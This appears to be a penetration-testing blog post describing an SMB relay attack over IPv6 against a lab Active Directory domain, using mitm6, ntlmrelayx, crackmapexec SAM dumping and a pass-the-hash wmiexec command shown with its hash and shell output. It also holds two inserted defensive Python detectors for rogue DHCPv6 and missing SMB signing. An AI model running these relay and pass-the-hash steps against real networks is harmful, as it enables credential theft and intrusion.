
Friday, September 17, 2021

Active Directory CORPORATIVE.domain.local Series [V]: SMB Relay over IPv6

 Hi everyone,


So far so good. In this post we are going to perform an SMB relay attack over the IPv6 protocol. Sometimes, when the IPv4 side of a network is well secured, this kind of attack can still be used to compromise SMB communication.


Now I'm going to describe the SMB relay process over IPv6 step by step, because it is a little different from the IPv4 version and uses other tools:

    1. The first step is to create a MitM (man-in-the-middle) position over the IPv6 protocol, which is very easy using the tool "mitm6":

You can find it at github on the following url: https://github.com/fox-it/mitm6



This tool poisons the network using DHCPv6: it replies with its own IPv6 link-local address and sets the attacker's host as the victim's default DNS server.


In the previous image you can see a poisoned target machine with the attacker's link-local IPv6 address configured as its DNS server.
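The DHCPv6 behaviour just described (an answer on the local segment that hands out a link-local address as the DNS server) is also what a defender can watch for. The following Python is an added example, not part of this post or of mitm6: it parses DHCPv6 Advertise/Reply messages, extracts OPTION_DNS_SERVERS, and raises alerts when the answering server or the advertised resolver is not on an allowlist, or when the resolver is a link-local address. The allowlist values, the addresses and the sample messages are constructed for the example; on a network where IPv6 is not deployed at all, empty allowlists make every server-side DHCPv6 message an alert.

```python
import ipaddress
import struct
from dataclasses import dataclass, field

# DHCPv6 message types (RFC 8415) and option codes (RFC 8415 / RFC 3646).
MSG_SOLICIT, MSG_ADVERTISE, MSG_REPLY = 1, 2, 7
OPT_SERVERID, OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 2, 23, 24

# Assumed site policy (hypothetical values): the only DHCPv6 server allowed to answer
# on this segment and the only DNS resolvers it may hand out. Leave both sets empty on
# a network without IPv6 deployment: every Advertise/Reply is then reported.
AUTHORIZED_SERVERS = {ipaddress.IPv6Address("fe80::1")}
ALLOWED_DNS = {ipaddress.IPv6Address("2001:db8::53")}


@dataclass
class Dhcp6Message:
    msg_type: int
    xid: int
    options: dict = field(default_factory=dict)  # option code -> list of raw option bodies


def parse_dhcp6(payload: bytes) -> Dhcp6Message:
    """Parse the 4-byte DHCPv6 header and the TLV option list that follows it."""
    if len(payload) < 4:
        raise ValueError("DHCPv6 payload too short")
    msg = Dhcp6Message(payload[0], int.from_bytes(payload[1:4], "big"))
    off = 4
    while off < len(payload):
        if off + 4 > len(payload):
            raise ValueError("truncated option header")
        code, length = struct.unpack_from("!HH", payload, off)
        off += 4
        if off + length > len(payload):
            raise ValueError("truncated option body")
        msg.options.setdefault(code, []).append(payload[off:off + length])
        off += length
    return msg


def dns_servers(msg: Dhcp6Message) -> list:
    """Return the resolver addresses carried in OPTION_DNS_SERVERS (16 bytes each)."""
    addrs = []
    for body in msg.options.get(OPT_DNS_SERVERS, []):
        if len(body) % 16:
            raise ValueError("DNS_SERVERS option length is not a multiple of 16")
        addrs.extend(ipaddress.IPv6Address(body[i:i + 16]) for i in range(0, len(body), 16))
    return addrs


def assess(src: str, payload: bytes, authorized=AUTHORIZED_SERVERS, allowed_dns=ALLOWED_DNS) -> list:
    """Return alert strings for one DHCPv6 message seen on the wire (src = sender IPv6)."""
    msg = parse_dhcp6(payload)
    if msg.msg_type not in (MSG_ADVERTISE, MSG_REPLY):
        return []  # client-side messages (Solicit, Request, ...) are not what we watch
    kind = "Advertise" if msg.msg_type == MSG_ADVERTISE else "Reply"
    alerts = []
    if ipaddress.IPv6Address(src) not in authorized:
        alerts.append(f"DHCPv6 {kind} from unauthorized server {src}")
    for dns in dns_servers(msg):
        if dns not in allowed_dns:
            alerts.append(f"DHCPv6 {kind} from {src} hands out non-allowlisted DNS server {dns}")
        if dns.is_link_local:
            alerts.append(f"DNS server {dns} is a link-local address, i.e. a host on this segment")
    return alerts


def build_dhcp6(msg_type: int, xid: int, options: list) -> bytes:
    """Serialize a DHCPv6 message; used here only to construct the sample traffic."""
    out = bytes([msg_type]) + xid.to_bytes(3, "big")
    for code, body in options:
        out += struct.pack("!HH", code, len(body)) + body
    return out


# Constructed samples: a legitimate Advertise from the authorized server, and a Reply
# from another link-local host that names itself as DNS server for the lab domain.
SAMPLE_LEGIT = ("fe80::1", build_dhcp6(MSG_ADVERTISE, 0xABCDEF, [
    (OPT_SERVERID, b"\x00\x03\x00\x01" + b"\x00\x11\x22\x33\x44\x55"),
    (OPT_DNS_SERVERS, ipaddress.IPv6Address("2001:db8::53").packed),
]))
SAMPLE_ROGUE = ("fe80::2", build_dhcp6(MSG_REPLY, 0x123456, [
    (OPT_DNS_SERVERS, ipaddress.IPv6Address("fe80::2").packed),
    (OPT_DOMAIN_LIST, b"\x0bcorporative\x06domain\x05local\x00"),
]))

if __name__ == "__main__":
    for src, payload in (SAMPLE_LEGIT, SAMPLE_ROGUE):
        print(src, assess(src, payload) or ["ok"])
```

To use it on live traffic, hand `assess()` the source address and UDP payload of each packet sent to the DHCPv6 client port (546); the parser only needs the DHCPv6 payload, not the IPv6/UDP headers.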


2. The second step is to use the ntlmrelayx.py tool to intercept SMB connections over the IPv6 network:

    



After a user attempts to access a non-existent SMB shared folder, we can intercept a SOCKS session for the user worker, who has administrative privileges:





3. Using proxychains with crackmapexec we can access the target machine through the SOCKS proxy on localhost without a password, because the SOCKS connection holds an already authenticated session:
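Steps 2 and 3 work only because the target accepts an SMB session that the client did not sign; a host that requires SMB signing rejects a relayed session. The following Python is an added example, not part of this post, of impacket or of crackmapexec: it parses the SecurityMode field of an SMB2 NEGOTIATE response (layout per MS-SMB2: 64-byte header, then a fixed 64-byte body whose StructureSize is 65) and reports per host whether signing is merely enabled or actually required. The hostnames and the response bytes are constructed for the example; the same parser applies to any SMB2/3 dialect.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000                  # Command value of NEGOTIATE
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001  # set on every response
SIGNING_ENABLED = 0x0001                 # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002                # SMB2_NEGOTIATE_SIGNING_REQUIRED
HEADER_LEN = 64
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}


def parse_negotiate_response(data: bytes) -> dict:
    """Pull DialectRevision and SecurityMode out of an SMB2 NEGOTIATE response."""
    if len(data) < HEADER_LEN + 64 or data[:4] != SMB2_MAGIC:
        raise ValueError("not a complete SMB2 message")
    command, = struct.unpack_from("<H", data, 12)   # header: Command at offset 12
    flags, = struct.unpack_from("<I", data, 16)     # header: Flags at offset 16
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    # body starts right after the header: StructureSize, SecurityMode, DialectRevision
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", data, HEADER_LEN)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def assess_signing(host: str, data: bytes) -> dict:
    """Classify one host: a relayed session is only usable where signing is not required."""
    info = parse_negotiate_response(data)
    name = DIALECTS.get(info["dialect"], hex(info["dialect"]))
    exposed = not info["signing_required"]
    if exposed:
        state = "enabled but optional" if info["signing_enabled"] else "disabled"
        reason = f"{host}: SMB {name}, signing {state} -> exposed to relayed sessions"
    else:
        reason = f"{host}: SMB {name}, signing required -> relayed session would be rejected"
    return {"host": host, "exposed": exposed, "reason": reason}


def build_negotiate_response(security_mode: int, dialect: int = 0x0300) -> bytes:
    """Constructed NEGOTIATE response with an empty security buffer; sample data only."""
    header = struct.pack("<4sHHIHHIIQIIQ16s",
                         SMB2_MAGIC, HEADER_LEN, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    # StructureSize, SecurityMode, DialectRevision, NegotiateContextCount, ServerGuid,
    # Capabilities, MaxTransactSize, MaxReadSize, MaxWriteSize, SystemTime,
    # ServerStartTime, SecurityBufferOffset, SecurityBufferLength, NegotiateContextOffset
    body = struct.pack("<HHHH16sIIIIQQHHI",
                       65, security_mode, dialect, 0, b"\x11" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 0, 0, 0)
    return header + body


# Constructed samples: a workstation with the default "enabled, not required" setting
# and a hypothetical hardened host (DC01) that requires signing.
SAMPLES = {
    "WKS-001": build_negotiate_response(SIGNING_ENABLED),
    "DC01": build_negotiate_response(SIGNING_ENABLED | SIGNING_REQUIRED),
}

if __name__ == "__main__":
    for host, data in SAMPLES.items():
        print(assess_signing(host, data)["reason"])
```

In practice the response bytes come from the first SMB2 message a server returns on TCP 445 after the client's NEGOTIATE request (with the 4-byte NetBIOS session header stripped); hosts reported as exposed are the ones where requiring signing removes this relay path.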

In the next image you can see the proxychains configuration and a connection test with the user's credentials using crackmapexec:



Example of dumping the SAM on the target machine using proxychains and crackmapexec:




It is possible to validate the NTLM hash against the target machine over IPv4:




And finally, execute a PtH (pass-the-hash) attack using the wmiexec tool:

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/wmiexec.py worker2@10.0.2.15 -hashes aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
corporative\worker2

C:\>ipconfig
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec

Configuración IP de Windows


Adaptador de Ethernet Ethernet:

   Sufijo DNS específico para la conexión. . : 
   Vínculo: dirección IPv6 local. . . : fe80::6580:58ad:d564:3e76%12
   Dirección IPv4. . . . . . . . . . . . . . : 10.0.2.15
   Máscara de subred . . . . . . . . . . . . : 255.255.255.0
   Puerta de enlace predeterminada . . . . . : 10.0.2.1

C:\>hostname
WKS-001

C:\>


And that is all for this Active Directory attack. I hope you enjoyed my fifth Windows entry and that you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

With kind regards, f0ns1


